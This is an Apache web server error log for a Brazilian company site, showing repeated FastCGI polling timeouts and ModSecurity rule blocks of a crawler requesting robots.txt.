[Sun Mar 15 23:54:22.446348 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.244.31:50538] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdw3rABkC4fWIHEf8G3NQAAAFY"]
[Sun Mar 15 23:54:24.149915 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:33762] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:54:46.119817 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:34138] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:54:58.765682 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.228.16:40986] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdxAv9ocpUE4ed4uDy7dQAAAhQ"]
[Sun Mar 15 23:55:53.117802 2026] [proxy_fcgi:error] [pid 21533:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:35312] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:56:14.089932 2026] [proxy_fcgi:error] [pid 10651:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:35586] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:56:40.095984 2026] [proxy_fcgi:error] [pid 32654:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:35854] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:57:01.069910 2026] [proxy_fcgi:error] [pid 21533:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:35988] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:57:22.125896 2026] [proxy_fcgi:error] [pid 21806:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:36118] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:57:44.122006 2026] [proxy_fcgi:error] [pid 10831:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:36240] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:58:06.045850 2026] [proxy_fcgi:error] [pid 32654:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:36358] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:58:27.133784 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:36492] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:58:49.134612 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:36642] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:59:10.121776 2026] [proxy_fcgi:error] [pid 21533:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:36770] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:59:32.134252 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:36924] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:59:34.609138 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.244.31:53648] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdyFglT9VtDQc7bgUxicQAAAQY"]
[Sun Mar 15 23:59:53.121779 2026] [proxy_fcgi:error] [pid 21946:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:37100] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:00:07.565634 2026] [:error] [pid 10709:tid 140411582465792] [client 74.7.228.16:41356] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdyNxXjF1vJNtV6CWrFaAAAAdM"]
[Mon Mar 16 00:00:14.125820 2026] [proxy_fcgi:error] [pid 32654:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:37272] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:00:35.134497 2026] [proxy_fcgi:error] [pid 10651:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:37450] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:00:56.033860 2026] [proxy_fcgi:error] [pid 21533:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:37562] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:01:17.050150 2026] [proxy_fcgi:error] [pid 21946:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:37744] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:01:38.138359 2026] [proxy_fcgi:error] [pid 21806:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:37856] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:02:01.133822 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:38006] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:02:22.149980 2026] [proxy_fcgi:error] [pid 21806:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:38184] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:02:43.125780 2026] [proxy_fcgi:error] [pid 10709:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:38382] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:03:05.137797 2026] [proxy_fcgi:error] [pid 10651:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:38544] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:03:26.106684 2026] [proxy_fcgi:error] [pid 21946:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:38648] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:03:48.129793 2026] [proxy_fcgi:error] [pid 21533:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:38780] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:04:11.129884 2026] [proxy_fcgi:error] [pid 10831:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:38954] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:04:33.129790 2026] [proxy_fcgi:error] [pid 21533:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:39086] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:04:54.129805 2026] [proxy_fcgi:error] [pid 10651:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:39228] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:04:57.632284 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.244.31:49090] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdzWdSswJuvopo3lOgvIgAAAII"]
[Mon Mar 16 00:05:15.157829 2026] [proxy_fcgi:error] [pid 10831:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:39334] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:05:37.112474 2026] [proxy_fcgi:error] [pid 10772:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:39462] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:05:39.490589 2026] [:error] [pid 21805:tid 140411641214720] [client 74.7.228.16:56374] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdzg7ABkC4fWIHEf8G3nQAAAEw"]
[Mon Mar 16 00:05:59.141799 2026] [proxy_fcgi:error] [pid 21806:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:39632] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:06:20.053806 2026] [proxy_fcgi:error] [pid 32654:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:39780] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:06:42.121802 2026] [proxy_fcgi:error] [pid 11972:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:40000] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:07:03.041877 2026] [proxy_fcgi:error] [pid 21533:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:40136] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:07:24.133792 2026] [proxy_fcgi:error] [pid 32654:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:40298] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:07:47.165789 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:40608] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:08:08.135505 2026] [proxy_fcgi:error] [pid 10709:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:40766] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:08:29.057819 2026] [proxy_fcgi:error] [pid 32654:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:40888] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:08:50.132376 2026] [proxy_fcgi:error] [pid 10709:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:41092] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:09:11.145810 2026] [proxy_fcgi:error] [pid 32654:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:41282] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:09:33.131460 2026] [proxy_fcgi:error] [pid 10709:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:41516] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:09:54.125822 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:41728] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:10:08.881892 2026] [:error] [pid 10651:tid 140411607643904] [client 74.7.244.31:38886] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abd0kLysWC90G-1nBrATkQAAAZA"]
[Mon Mar 16 00:10:16.122507 2026] [proxy_fcgi:error] [pid 10651:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:41860] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:10:37.124730 2026] [proxy_fcgi:error] [pid 10772:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:41940] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:10:47.214933 2026] [:error] [pid 10709:tid 140411683178240] [client 74.7.228.16:47202] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abd0txXjF1vJNtV6CWrF3wAAAcc"]
[Mon Mar 16 00:10:58.125800 2026] [proxy_fcgi:error] [pid 10772:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:42124] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:11:19.087442 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:42240] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:11:40.132772 2026] [proxy_fcgi:error] [pid 10772:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:42456] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:12:03.144074 2026] [proxy_fcgi:error] [pid 21533:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:42746] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:12:24.122518 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:42982] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:12:45.153812 2026] [proxy_fcgi:error] [pid 11972:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:43192] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:13:08.140336 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:43396] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:13:29.103715 2026] [proxy_fcgi:error] [pid 21533:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:43564] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:13:51.136300 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:43782] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:14:17.127961 2026] [proxy_fcgi:error] [pid 10772:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:44024] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:14:39.117811 2026] [proxy_fcgi:error] [pid 10651:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:44248] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:15:00.129864 2026] [proxy_fcgi:error] [pid 10831:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:44384] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:15:21.125824 2026] [proxy_fcgi:error] [pid 32654:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:44548] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:15:42.133794 2026] [proxy_fcgi:error] [pid 10651:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:44786] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:16:03.133787 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:44974] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:16:06.752922 2026] [:error] [pid 10709:tid 140411565680384] [client 74.7.228.16:59220] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abd19hXjF1vJNtV6CWrGaAAAAdU"]
[Mon Mar 16 00:16:25.057801 2026] [proxy_fcgi:error] [pid 21805:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:45188] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:16:46.057825 2026] [proxy_fcgi:error] [pid 21806:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:45370] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:17:07.122643 2026] [proxy_fcgi:error] [pid 11972:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:45494] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:17:28.135175 2026] [proxy_fcgi:error] [pid 10651:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:45630] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:17:50.137823 2026] [proxy_fcgi:error] [pid 21806:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:45770] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:18:11.140345 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:45916] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:18:32.141777 2026] [proxy_fcgi:error] [pid 32654:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:46040] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:18:53.125823 2026] [proxy_fcgi:error] [pid 10651:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:46190] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:19:14.114294 2026] [proxy_fcgi:error] [pid 21805:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:46380] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:19:38.085865 2026] [proxy_fcgi:error] [pid 21805:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:46554] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:20:00.113906 2026] [proxy_fcgi:error] [pid 32654:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:46850] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:20:21.125783 2026] [proxy_fcgi:error] [pid 21946:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:47128] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:20:36.098770 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.244.31:37738] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abd3BNSswJuvopo3lOgvzgAAAJE"]
[Mon Mar 16 00:20:42.131406 2026] [proxy_fcgi:error] [pid 10772:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:47342] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:21:03.126725 2026] [proxy_fcgi:error] [pid 10709:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:47564] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:21:11.071329 2026] [:error] [pid 32654:tid 140411582465792] [client 74.7.228.16:54208] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abd3JwlT9VtDQc7bgUxkWAAAARM"]
[Mon Mar 16 00:21:24.045856 2026] [proxy_fcgi:error] [pid 21806:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:47744] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:21:45.129566 2026] [proxy_fcgi:error] [pid 10709:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:47932] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:22:07.129800 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:48150] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:22:28.131959 2026] [proxy_fcgi:error] [pid 11972:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:48318] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:22:49.134861 2026] [proxy_fcgi:error] [pid 21533:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:48536] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:23:10.119065 2026] [proxy_fcgi:error] [pid 10831:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:48718] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:23:32.094929 2026] [proxy_fcgi:error] [pid 21806:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:48896] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:23:53.094181 2026] [proxy_fcgi:error] [pid 11972:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:49064] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:24:14.122236 2026] [proxy_fcgi:error] [pid 10709:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:49268] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:24:35.127322 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:49448] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:24:56.033823 2026] [proxy_fcgi:error] [pid 32654:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:49656] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:25:18.122303 2026] [proxy_fcgi:error] [pid 10831:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:49882] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:25:43.033795 2026] [proxy_fcgi:error] [pid 10831:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:50054] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:26:04.129283 2026] [proxy_fcgi:error] [pid 10831:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:50194] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:26:17.673229 2026] [:error] [pid 32654:tid 140411632822016] [client 74.7.244.31:43860] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abd4WQlT9VtDQc7bgUxkzQAAAQ0"]
[Mon Mar 16 00:26:25.137796 2026] [proxy_fcgi:error] [pid 32654:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:50344] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:26:34.363180 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.228.16:43308] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abd4ao6lpbStxTqkSks5bQAAAkQ"]
[Mon Mar 16 00:26:47.078030 2026] [proxy_fcgi:error] [pid 21805:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:50514] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:27:08.289256 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:50736] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:27:29.492613 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:51004] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:27:51.121912 2026] [proxy_fcgi:error] [pid 21946:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:51216] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:28:13.139670 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:51398] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:28:34.127033 2026] [proxy_fcgi:error] [pid 21946:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:51490] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:28:55.129794 2026] [proxy_fcgi:error] [pid 10709:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:51638] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:29:16.045848 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:51742] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:29:37.021913 2026] [proxy_fcgi:error] [pid 21806:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:51884] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:29:58.129817 2026] [proxy_fcgi:error] [pid 10831:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:52042] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:30:20.133146 2026] [proxy_fcgi:error] [pid 10709:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:52180] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:30:41.057829 2026] [proxy_fcgi:error] [pid 10831:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:52306] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:31:04.128667 2026] [proxy_fcgi:error] [pid 32654:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:52488] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:31:27.129783 2026] [proxy_fcgi:error] [pid 10651:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:52618] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:31:48.131504 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:52772] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:32:09.129845 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:52870] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:32:13.308254 2026] [:error] [pid 21533:tid 140411666392832] [client 74.7.244.31:41638] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abd5vXjZBu2q05ozVU8fygAAAUk"]
[Mon Mar 16 00:32:30.133822 2026] [proxy_fcgi:error] [pid 21806:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:53000] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:32:48.462826 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.228.16:45582] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abd54LABkC4fWIHEf8G4tQAAAE4"]
[Mon Mar 16 00:32:51.139589 2026] [proxy_fcgi:error] [pid 10831:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:53116] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:33:12.057829 2026] [proxy_fcgi:error] [pid 10651:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:53262] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:33:35.133793 2026] [proxy_fcgi:error] [pid 10772:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:53524] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:33:56.130039 2026] [proxy_fcgi:error] [pid 11972:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:53644] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:34:17.122978 2026] [proxy_fcgi:error] [pid 10709:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:53822] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:34:38.123436 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:53944] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:34:59.077829 2026] [proxy_fcgi:error] [pid 21806:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:54048] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:35:20.125865 2026] [proxy_fcgi:error] [pid 21946:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:54252] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:35:42.120514 2026] [proxy_fcgi:error] [pid 10709:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:54394] AH01075: Error dispatching request to : (polling)
